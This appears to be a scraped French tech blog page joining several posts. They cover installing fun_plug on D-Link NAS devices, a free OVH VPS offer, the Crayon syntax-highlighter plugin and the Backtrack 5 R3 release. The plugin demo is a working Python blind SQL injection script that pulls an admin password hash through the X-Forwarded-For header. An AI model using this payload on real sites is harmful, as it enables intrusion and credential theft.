source: Techbrunch
Un petit tutoriel condensé qui expliquer comment installer la version 0.7 de fun_plug sur un NAS Dlink.
Ce tutoriel est valable pour les NAS : DNS-320/323/325/345, CH3MNAS et CH3SNAS.
Première étape on désinstalle le version précédente si besoin. Pour cela je vous invite à vous reporter à cet article qui expliquer comment désinstaller fun_plug sur un NAS (DNS 320/325 ou 345).
Assurez vous que le NAS possède une connexion réseau, vérifiez que la passerelle par défaut ainsi que les paramètres DNS soit correctement configurés. Ces paramètres sont modifiable via l’interface web dans Gestion > Gestion du réseau > Configuration du réseau local.
Deux fichiers sont à télécharger pour installer fun_plug :
Les deux fichiers sont à placer à la racine du NAS, vous pouvez ensuite procéder au reboot du NAS.
Vous devriez désormais être en mesure de vous connecter via Telnet (port 23) sur le NAS, pour cela j’utilise Putty.
Une fois connecter au NAS il faut :
usermod -s /ffp/bin/sh root mkdir -p /ffp/home/root/ sed -ie 's#:/home/root:#:/ffp/home/root:#g' /etc/passwd pwconv passwd login
wget http://wolf-u.li/u/172/ -O /ffp/sbin/store-passwd.sh store-passwd.sh
chmod a+x /ffp/start/sshd.sh sh /ffp/start/sshd.sh start
chmod -x /ffp/start/telnetd.sh
Vous cherchez actuellement à louer un VPS ? Si vous n’êtes pas très exigeant en terme de performance alors ne cherchez plus j’ai trouvé ce qu’il vous faut.
L’info n’est pas toute fraîche mais je ne pense pas que tout le monde soit au courant, OVH propose actuellement de tester leur réseau en offrant gratuitement des VPS. Ce VPS fait partie de l’offre Kimsufi proposant des serveur dédié à partir de 18€ par mois. Pour profiter de l’offre il suffit de posséder un compte chez OVH (que vous pourrez créer ici) et de fournir son numéro de téléphone via le formulaire, l’offre étant limitée à un serveur par personne. Un SMS vous sera alors envoyé et vous pourrez ensuite choisir l’emplacement de votre VPS parmi les différents point de présence (Paris,Hong-Kong, Chicago…).
Le Micro vKS est une version allégée des modèles classiques conçue pour des applications peu gourmandes et certaine limitations ont été mise en place afin d’éviter les abus : interdiction du trafic sortant sur le port 25 et de tout trafic UDP (sauf DNS).
Processeur 1 vCPU | |
Mémoire vive 128 Mo | |
Stockage 5 Go | |
Trafic mensuel 500 Go |
Bande passante 10Mbps | |
Adresses IPv4 + IPv6 | |
Trafic UDP non autorisé | |
Trafic sortant sur le port 25 interdit |
Bon il ne faut pas se voiler la face mais avec 128 Mo de mémoire vive et 5 Go de stockage les possibilités d’utilisation restes limitées cependant il est toujours possible d’installer un petit serveur web avec lighttpd et PHP ou encore de le transformer en seedbox pour partager vos distributions préféré en installant transmission. Pour ceux qui ne sont pas très à l’aise avec les système linux ou bien qui n’ont jamais eu à configurer un VPS je vous recommande ce tutoriel de Sorrodje.
Quel est le système de virtualisation utilisé ?
Les vKS sont basés sur OpenVZ.
Que se passe-t-il quand j’ai atteint ma limite de trafic ?
Si vous atteignez le quota mensuel, votre bande passante sera automatiquement bridée à 1 mbps. Vous retrouverez votre bande passante habituelle à la date de renouvellement de votre vKS.
Est-ce qu’il y a un monitoring des ressources dans le Manager du vKS ?
Non, le monitoring doit être géré par l’utilisateur.
La bande passante est-elle garantie ?
Non.
Il y a sur le site une liste de distributions, mais à la commande on me propose uniquement Debian…
C’est normal, votre vKS est livré avec l’OS Debian 6 préinstallé.
Pour choisir votre release, il vous suffit de réinstaller votre vKS avec la release voulue depuis le Manager V5. Votre serveur redémarrera en moins de 5 minutes avec la bonne distribution.
Y a-t-il des utilisations interdites sur vKS ?
La seule activité interdite est le VPN. Veuillez également noter que NFS Kernel n’est pas disponible.
Y a-t-il des dispositifs de protection contre les attaques ?
Afin de prémunir l’infrastructure des risques d’attaque, la connexion UDP est limitée à 10 Mbps, et les flux ICMP à 32 Kbps.
J’ai pas mal galéré avant de trouver le plugin parfait pour afficher du code dans un article mais je pense que j’ai trouvé le plugin ultime.
Ce plugin c’est Crayon Syntax Highlighter, développé en PHP il utilise la librairie javascript jQuery afin d’afficher avec la coloration un très grand nombre de langages. Crayon peut afficher du code à partir d’une URL, d’un fichier ou bien d’un article. Crayon permet d’ajouter simplement de nouveaux langages grâce à l’utilisation d’expressions régulières.
Les principaux avantages de Crayon sont :
Ci-dessous un exemple de code utilisant plusieurs langages de programmation :
Une petite démo avec un code que j’avais présenté dans un article précédent :
import httplib import urllib import re password = "" md5 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'] cpt = 0 i = 1 while i<=32: print 'Recherche du caractère '+str(i) if cpt == 16: cpt = 0 print 'Test caractere : '+md5[cpt] params = urllib.urlencpt({'login': 'admin', 'pwd': 'password'}) headers = {"Content-type": "application/x-www-form-urlencptd","Accept": "text/plain","x-forwarded-for":"127.0.0.1' or ascii(substring(pwd,"+str(i)+",1))="+str(ord(md5[cpt]))+"#"} conn = httplib.HTTPConnection("www.site.com:80") conn.request("POST", "/index.php", params, headers) response = conn.getresponse() print response.status, response.reason data = response.read() conn.close() if not(re.search('incorrect',data)): print 'Caractère trouvé : '+md5[cpt] password += md5[cpt] i += 1 cpt = 0 else: cpt += 1 print 'MD5 = '+str(password)
Si ce plugin vous a convaincu, il est téléchargeable directement sur Wordress.org.
PS : Le plugin ne fonctionne pas uniquement avec WordPress, il suffit d’un environnement PHP comme expliqué dans cet article.
Liens :
Backtrack 5 R3 est désormais disponible au téléchargement avec un grand nombre de bugs corrigés et de nouveaux outils à la pelle !
Cette troisième version de Backtrack 5 a permis de se concentrer sur la correction de bugs ainsi que l’addition de plus de 60 nouveaux outils, parmi lesquels plusieurs ont été présenté lors des conférences BlackHat et Defcon 2012.
Une nouvelle catégorie d’outils fait son apparition : “Physical Exploitation” qui inclu désormais des outils tel qu’un IDE pour Arduino et la boite à outil Kautilya qui permet d’utiliser un Tensy à la manière du Rubber Ducky.
Backtrack 5 R3 est téléchargeable via torrent en 5 versions :
Si vous êtes un peu patient elles seront disponibles via des mirroirs HTTP dans quelques heures.
Happy Hacking